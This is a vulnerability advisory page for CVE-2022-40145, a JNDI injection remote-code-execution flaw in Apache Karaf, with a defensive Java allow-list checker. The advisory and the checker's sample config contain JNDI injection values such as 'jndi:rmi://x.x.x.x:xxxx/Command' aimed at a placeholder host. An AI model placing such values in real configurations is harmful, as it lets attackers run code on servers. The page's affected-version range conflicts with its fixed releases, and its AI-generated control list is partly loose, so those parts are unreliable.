Cyber Resilience

CVE-2022-40145

Severity: Critical
Published: 21 December 2022
Modified: 15 April 2025
KEV Added: not listed
Patch: available; upgrade to 4.4.2 or 4.3.8
CVSS v3.1 Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.0539 (90.3rd percentile)
Risk Priority: 23 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2022-40145 is a critical-severity Improper Input Validation (CWE-20) vulnerability in Apache Karaf. Its CVSS base score is 9.8 (Critical).

Operationally, it ranks in the top 9.7% of CVEs by EPSS exploit likelihood; it is not currently listed in the CISA KEV catalog.

Deeper analysis

CVE-2022-40145 is an input-validation flaw in Apache Karaf that permits code injection through an attacker-controlled JNDI LDAP URI supplied as a JDBC data-source name. The vulnerable code path is JDBCUtils.doCreateDatasource, which passes the value of the DATASOURCE option directly to InitialContext.lookup without sanitization; the issue affects all releases up to and including Karaf 4.4.1 and 4.3.7.

An unauthenticated remote attacker who can influence the LDAP server referenced by a Karaf JDBCLoginModule configuration can return a malicious JNDI reference, causing the Karaf instance to execute arbitrary code. Successful exploitation yields full confidentiality, integrity, and availability impact, reflected in the CVSS 9.8 score.

The official Apache Karaf advisory directs users to upgrade to 4.4.2 or 4.3.8, which contain the corrected JDBCUtils implementation that rejects unsafe JNDI schemes.

EPSS remains flat at 0.0539 with no material increase after disclosure, and no confirmed in-the-wild exploitation has been reported.

Vulnerability details

This vulnerability concerns a potential code injection when an attacker controls the target LDAP server used in the JDBC JNDI URL. The function `jaas.modules.src.main.java.org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource` uses `InitialContext.lookup(jndiName)` without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in `JdbcLoginModuleTest#setup`. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI and an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8.
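The deeper analysis and the vulnerability details above both come down to one point: the value of the `datasource` option reaches `InitialContext.lookup` unchanged, so any scheme the JNDI provider understands (rmi, ldap, dns, ...) can be named from configuration. The following Java class is an added example, not Apache Karaf's code and not the project's actual patch: it shows the unchecked lookup shape beside an allow-list check that admits only `osgi:` names, and applies that check to a few constructed login-module configuration lines. The `datasource` option key, the `osgi`-only allow-list and the sample configuration are assumptions made for the example.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.Set;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.sql.DataSource;

/**
 * Added example (not Karaf's code): an allow-list check on the JDBC data-source
 * name before it reaches InitialContext.lookup, plus an audit over constructed
 * login-module configuration lines. The "osgi"-only allow-list is an assumption
 * about what a JDBCLoginModule deployment needs, not the project's own fix.
 */
public final class DataSourceNameGuard {

    /** Assumed option key; the page refers to it as JDBCUtils.DATASOURCE. */
    static final String DATASOURCE_KEY = "datasource";

    /** Assumed allow-list: a login module should only ever resolve OSGi services. */
    private static final Set<String> ALLOWED_SCHEMES = Set.of("osgi");

    /** Shape described for the affected releases: the option value goes straight to lookup. */
    static DataSource lookupUnchecked(String jndiName) throws NamingException {
        return (DataSource) new InitialContext().lookup(jndiName);
    }

    /**
     * Hardened shape: strip an optional "jndi:" prefix, then require an explicit,
     * allow-listed scheme. rmi://, ldap://, dns:// and similar are rejected before any
     * naming provider is contacted, so a remote server named in the value is never reached.
     */
    static String requireSafeJndiName(String raw) {
        if (raw == null || raw.isBlank()) {
            throw new IllegalArgumentException("data source name must not be empty");
        }
        String name = raw.trim();
        if (name.regionMatches(true, 0, "jndi:", 0, 5)) {
            name = name.substring(5);
        }
        int colon = name.indexOf(':');
        if (colon <= 0) {
            throw new IllegalArgumentException("missing scheme in data source name: " + raw);
        }
        String scheme = name.substring(0, colon).toLowerCase(Locale.ROOT);
        if (!ALLOWED_SCHEMES.contains(scheme)) {
            throw new IllegalArgumentException("refusing JNDI scheme '" + scheme + "' in: " + raw);
        }
        return name;
    }

    /** Same lookup as above, but only after the name has passed the allow-list. */
    static DataSource lookupChecked(String raw) throws NamingException {
        return (DataSource) new InitialContext().lookup(requireSafeJndiName(raw));
    }

    /** Audit "datasource = value" lines from a login-module config; returns offending lines. */
    static List<String> findUnsafeDataSourceLines(List<String> configLines) {
        List<String> bad = new ArrayList<>();
        for (String line : configLines) {
            String t = line.trim();
            int eq = t.indexOf('=');
            if (eq < 0 || !t.substring(0, eq).trim().equalsIgnoreCase(DATASOURCE_KEY)) {
                continue;
            }
            try {
                requireSafeJndiName(t.substring(eq + 1));
            } catch (IllegalArgumentException e) {
                bad.add(line + "  <- " + e.getMessage());
            }
        }
        return bad;
    }

    public static void main(String[] args) {
        // Constructed sample config: one legitimate OSGi reference (the form used in the
        // page's test snippet), two names modelled on the page's jndi:rmi://... pattern,
        // and one unrelated option that the audit must ignore.
        List<String> config = List.of(
            "datasource = osgi:" + DataSource.class.getName(),
            "datasource = jndi:rmi://x.x.x.x:xxxx/Command",
            "datasource = ldap://x.x.x.x:xxxx/cn=Command",
            "query.password = SELECT PASSWORD FROM USERS WHERE USERNAME=?"
        );
        List<String> findings = findUnsafeDataSourceLines(config);
        System.out.println(findings.size() + " unsafe data source name(s) found");
        findings.forEach(f -> System.out.println("  " + f));
    }
}
```

Compile with a Java 11 or newer JDK and run the class; only `requireSafeJndiName` and the audit execute, since `lookupChecked` needs a live JNDI environment. The check deliberately keys on the scheme rather than on a blocklist of hostnames or protocols: rejecting everything except the one scheme the module legitimately needs is what closes the class of bug, whereas a blocklist of `rmi`/`ldap` leaves every other provider scheme open.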

CWE(s)

CWE-20 (Improper Input Validation), CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component, 'Injection')

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

Vendor: apache
Product: karaf
Versions: ≤ 4.3.8 · 4.4.0 to 4.4.2 (range as listed in the affected-assets data; the advisory text above names 4.3.8 and 4.4.2 as the fixed releases)

Mitigating Controls

Likely Mitigating Controls (AI-generated mapping)

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

Addresses CWE-20, CWE-74: Security testing and evaluation at multiple SDLC stages directly detects missing or flawed input validation, with the required remediation process ensuring fixes are applied.

Addresses CWE-20: Security testing and developer training directly verify and enforce proper input validation, reducing exploitability of injection and malformed-data weaknesses.

Addresses CWE-20: Directly implements checks on information inputs to reject invalid data before processing.

Addresses CWE-74: Identifies indicators of injection attacks (command, SQL, LDAP, etc.) via anomaly and attack monitoring.

Addresses CWE-20: Spam protection mechanisms perform filtering and detection on inbound/outbound messages, directly compensating for missing or weak input validation of unsolicited content.
